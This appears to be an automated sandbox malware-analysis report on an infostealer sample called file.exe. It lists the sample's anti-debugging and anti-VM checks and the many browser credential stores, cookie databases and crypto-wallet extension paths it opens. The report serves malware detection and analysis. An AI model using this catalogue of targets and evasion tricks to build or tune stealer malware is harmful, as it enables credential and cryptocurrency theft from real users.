          Source: file.exe, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000748000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.0000000005451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: file.exe, 00000000.00000002.2453107458.0000000005F67000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2448950958.0000000000AA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: file.exe, 00000000.00000002.2453107458.0000000005F67000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2448950958.0000000000AA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000000.00000003.2365723765.0000000000781000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6088, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"p":"%appdata%\\Electrum\\wallets","m":["*"Gp
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: file.exeString found in binary or memory: Jaxx Liberty
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet","m":["*7p_~zA
          Source: file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet","m":["*7p_~zA
          Source: file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum","d":1,"fs":2097152>pT~"@
          Source: file.exe, 00000000.00000003.2177763867.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.2177763867.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
